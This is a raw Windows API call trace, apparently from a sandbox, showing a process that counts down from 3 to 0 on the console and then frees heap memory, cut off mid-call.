PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.840] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b1 [0264.840] Sleep (dwMilliseconds=0x64) [0264.943] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0264.945] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b1 [0264.945] Sleep (dwMilliseconds=0x64) [0265.116] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0265.120] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0265.120] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x083") returned 2 [0265.120] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0265.127] __iob_func () returned 0x74971208 [0265.127] _fileno (_File=0x74971228) returned 1 [0265.127] _errno () returned 0x60f05b0 [0265.128] _get_osfhandle (_FileHandle=1) returned 0x3c [0265.128] _errno () returned 0x60f05b0 [0265.128] GetFileType (hFile=0x3c) returned 0x2 [0265.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0265.128] GetFileType (hFile=0x3c) returned 0x2 [0265.128] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0265.130] __iob_func () returned 0x74971208 [0265.130] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0265.130] lstrlenW (lpString="\x083") returned 2 [0265.130] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0265.132] Sleep (dwMilliseconds=0x64) [0265.233] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0265.283] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0265.283] Sleep (dwMilliseconds=0x64) [0265.386] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0265.391] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0265.391] Sleep (dwMilliseconds=0x64) [0265.498] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0265.508] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0265.508] Sleep (dwMilliseconds=0x64) [0265.639] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0265.692] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0265.692] Sleep (dwMilliseconds=0x64) [0265.794] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0265.796] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0265.796] Sleep (dwMilliseconds=0x64) [0265.898] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0265.900] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0265.900] Sleep (dwMilliseconds=0x64) [0266.001] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.004] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b2 [0266.004] Sleep (dwMilliseconds=0x64) [0266.118] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.121] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.121] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x082") returned 2 [0266.121] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0266.124] __iob_func () returned 0x74971208 [0266.124] _fileno (_File=0x74971228) returned 1 [0266.124] _errno () returned 0x60f05b0 [0266.124] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.124] _errno () returned 0x60f05b0 [0266.124] GetFileType (hFile=0x3c) returned 0x2 [0266.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.124] GetFileType (hFile=0x3c) returned 0x2 [0266.124] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0266.125] __iob_func () returned 0x74971208 [0266.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.125] lstrlenW (lpString="\x082") returned 2 [0266.126] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0266.128] Sleep (dwMilliseconds=0x64) [0266.229] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.231] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.231] Sleep (dwMilliseconds=0x64) [0266.332] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.334] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.334] Sleep (dwMilliseconds=0x64) [0266.435] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.444] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.444] Sleep (dwMilliseconds=0x64) [0266.545] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.548] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.548] Sleep (dwMilliseconds=0x64) [0266.649] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.652] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.653] Sleep (dwMilliseconds=0x64) [0266.758] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.761] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.761] Sleep (dwMilliseconds=0x64) [0266.862] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0266.903] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0266.903] Sleep (dwMilliseconds=0x64) [0267.006] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.008] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b3 [0267.008] Sleep (dwMilliseconds=0x64) [0267.110] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.116] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.116] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x081") returned 2 [0267.116] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0267.121] __iob_func () returned 0x74971208 [0267.121] _fileno (_File=0x74971228) returned 1 [0267.121] _errno () returned 0x60f05b0 [0267.121] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.121] _errno () returned 0x60f05b0 [0267.121] GetFileType (hFile=0x3c) returned 0x2 [0267.121] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0267.121] GetFileType (hFile=0x3c) returned 0x2 [0267.121] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0267.125] __iob_func () returned 0x74971208 [0267.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0267.125] lstrlenW (lpString="\x081") returned 2 [0267.125] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0267.129] Sleep (dwMilliseconds=0x64) [0267.232] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.242] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.242] Sleep (dwMilliseconds=0x64) [0267.343] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.344] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.344] Sleep (dwMilliseconds=0x64) [0267.446] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.447] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.447] Sleep (dwMilliseconds=0x64) [0267.618] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.678] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.678] Sleep (dwMilliseconds=0x64) [0267.779] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.780] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.780] Sleep (dwMilliseconds=0x64) [0267.880] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.881] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.881] Sleep (dwMilliseconds=0x64) [0267.981] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0267.982] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b4 [0267.982] Sleep (dwMilliseconds=0x64) [0268.130] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0268.132] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x623a98b5 [0268.132] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x080") returned 2 [0268.132] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0268.133] __iob_func () returned 0x74971208 [0268.133] _fileno (_File=0x74971228) returned 1 [0268.133] _errno () returned 0x60f05b0 [0268.133] _get_osfhandle (_FileHandle=1) returned 0x3c [0268.133] _errno () returned 0x60f05b0 [0268.133] GetFileType (hFile=0x3c) returned 0x2 [0268.133] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0268.133] GetFileType (hFile=0x3c) returned 0x2 [0268.133] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0268.133] __iob_func () returned 0x74971208 [0268.134] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0268.134] lstrlenW (lpString="\x080") returned 2 [0268.134] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0268.134] Sleep (dwMilliseconds=0x64) [0268.236] __iob_func () returned 0x74971208 [0268.236] _fileno (_File=0x74971228) returned 1 [0268.236] _errno () returned 0x60f05b0 [0268.236] _get_osfhandle (_FileHandle=1) returned 0x3c [0268.236] _errno () returned 0x60f05b0 [0268.236] GetFileType (hFile=0x3c) returned 0x2 [0268.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0268.237] GetFileType (hFile=0x3c) returned 0x2 [0268.237] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0268.237] __iob_func () returned 0x74971208 [0268.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0268.237] lstrlenW (lpString="\n") returned 1 [0268.237] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x24106c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0x24106c*, lpNumberOfCharsWritten=0xdfa98*=0x1) returned 1 [0268.238] GetProcessHeap () returned 0x4750000 [0268.238] GetProcessHeap () returned 0x4750000 [0268.238] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d3d8) returned 1 [0268.238] GetProcessHeap () returned 0x4750000 [0268.238] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475d3d8) returned 0xa0 [0268.239] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d3d8 | out: hHeap=0x4750000) returned 1 [0268.239] GetProcessHeap () returned 0x4750000 [0268.239] GetProcessHeap () returned 0x4750000 [0268.239] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d290) returned 1 [0268.239] GetProcessHeap () returned 0x4750000 [0268.239] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475d290) returned 0x10 [0268.239] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d290 | out: hHeap=0x4750000) returned 1 [0268.239] GetProcessHeap () returned 0x4750000 [0268.239] GetProcessHeap () returned 0x4750000 [0268.239] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c148) returned 1 [0268.240] GetProcessHeap () returned 0x4750000 [0268.240] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c148) returned 0x14 [0268.240] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c148 | out: hHeap=0x4750000) returned 1 [0268.240] GetProcessHeap () returned 0x4750000 [0268.240] GetProcessHeap () returned 0x4750000 [0268.240] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4752950) returned 1 [0268.240] GetProcessHeap () returned 0x4750000 [0268.240] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4752950) returned 0x4 [0268.240] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4752950 | out: hHeap=0x4750000) returned 1 [0268.240] GetProcessHeap () returned 0x4750000 [0268.240] GetProcessHeap () returned 0x4750000 [0268.240] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d1e8) returned 1 [0268.240] GetProcessHeap () returned 0x4750000 [0268.240] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475d1e8) returned 0x10 [0268.240] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d1e8 | out: hHeap=0x4750000) returned 1 [0268.241] GetProcessHeap () returned 0x4750000 [0268.241] GetProcessHeap () returned 0x4750000 [0268.241] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c488) returned 1 [0268.241] GetProcessHeap () returned 0x4750000 [0268.241] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c488) returned 0x14 [0268.241] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c488 | out: hHeap=0x4750000) returned 1 [0268.241] GetProcessHeap () returned 0x4750000 [0268.241] GetProcessHeap () returned 0x4750000 [0268.241] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c4e8) returned 1 [0268.241] GetProcessHeap () returned 0x4750000 [0268.241] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c4e8) returned 0x208 [0268.241] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c4e8 | out: hHeap=0x4750000) returned 1 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757420) returned 1 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4757420) returned 0x10 [0268.242] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757420 | out: hHeap=0x4750000) returned 1 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c208) returned 1 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c208) returned 0x14 [0268.242] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c208 | out: hHeap=0x4750000) returned 1 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] GetProcessHeap () returned 0x4750000 [0268.242] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475e3b8) returned 1 [0268.242] GetProcessHeap () returned 0x4750000 [0268.243] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475e3b8) returned 0x200 [0268.243] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475e3b8 | out: hHeap=0x4750000) returned 1 [0268.243] GetProcessHeap () returned 0x4750000 [0268.243] GetProcessHeap () returned 0x4750000 [0268.243] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d218) returned 1 [0268.243] GetProcessHeap () returned 0x4750000 [0268.243] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475d218) returned 0x10 [0268.243] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d218 | out: hHeap=0x4750000) returned 1 [0268.243] GetProcessHeap () returned 0x4750000 [0268.244] GetProcessHeap () returned 0x4750000 [0268.244] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c1e8) returned 1 [0268.244] GetProcessHeap () returned 0x4750000 [0268.244] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c1e8) returned 0x14 [0268.244] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c1e8 | out: hHeap=0x4750000) returned 1 [0268.244] GetProcessHeap () returned 0x4750000 [0268.244] GetProcessHeap () returned 0x4750000 [0268.244] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d068) returned 1 [0268.244] GetProcessHeap () returned 0x4750000 [0268.244] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475d068) returned 0xa [0268.244] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d068 | out: hHeap=0x4750000) returned 1 [0268.244] GetProcessHeap () returned 0x4750000 [0268.244] GetProcessHeap () returned 0x4750000 [0268.245] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475cff0) returned 1 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475cff0) returned 0x10 [0268.245] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475cff0 | out: hHeap=0x4750000) returned 1 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c228) returned 1 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c228) returned 0x14 [0268.245] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c228 | out: hHeap=0x4750000) returned 1 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d1d0) returned 1 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475d1d0) returned 0xa [0268.245] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d1d0 | out: hHeap=0x4750000) returned 1 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] GetProcessHeap () returned 0x4750000 [0268.245] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d260) returned 1 [0268.245] GetProcessHeap () returned 0x4750000 [0268.246] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475d260) returned 0x10 [0268.246] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475d260 | out: hHeap=0x4750000) returned 1 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c308) returned 1 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c308) returned 0x14 [0268.246] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c308 | out: hHeap=0x4750000) returned 1 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4758558) returned 1 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4758558) returned 0x2 [0268.246] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4758558 | out: hHeap=0x4750000) returned 1 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757090) returned 1 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4757090) returned 0x14 [0268.246] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757090 | out: hHeap=0x4750000) returned 1 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] GetProcessHeap () returned 0x4750000 [0268.246] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x47572a0) returned 1 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x47572a0) returned 0x14 [0268.247] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x47572a0 | out: hHeap=0x4750000) returned 1 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4752930) returned 1 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4752930) returned 0x14 [0268.247] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4752930 | out: hHeap=0x4750000) returned 1 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x47589a8) returned 1 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x47589a8) returned 0x14 [0268.247] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x47589a8 | out: hHeap=0x4750000) returned 1 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c3c8) returned 1 [0268.247] GetProcessHeap () returned 0x4750000 [0268.247] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c3c8) returned 0x14 [0268.248] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c3c8 | out: hHeap=0x4750000) returned 1 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c4a8) returned 1 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c4a8) returned 0x14 [0268.248] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c4a8 | out: hHeap=0x4750000) returned 1 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x47581b8) returned 1 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x47581b8) returned 0x30 [0268.248] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x47581b8 | out: hHeap=0x4750000) returned 1 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c288) returned 1 [0268.248] GetProcessHeap () returned 0x4750000 [0268.248] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c288) returned 0x14 [0268.249] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c288 | out: hHeap=0x4750000) returned 1 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4753828) returned 1 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] RtlSizeHeap (HeapHandle=0x4750000, 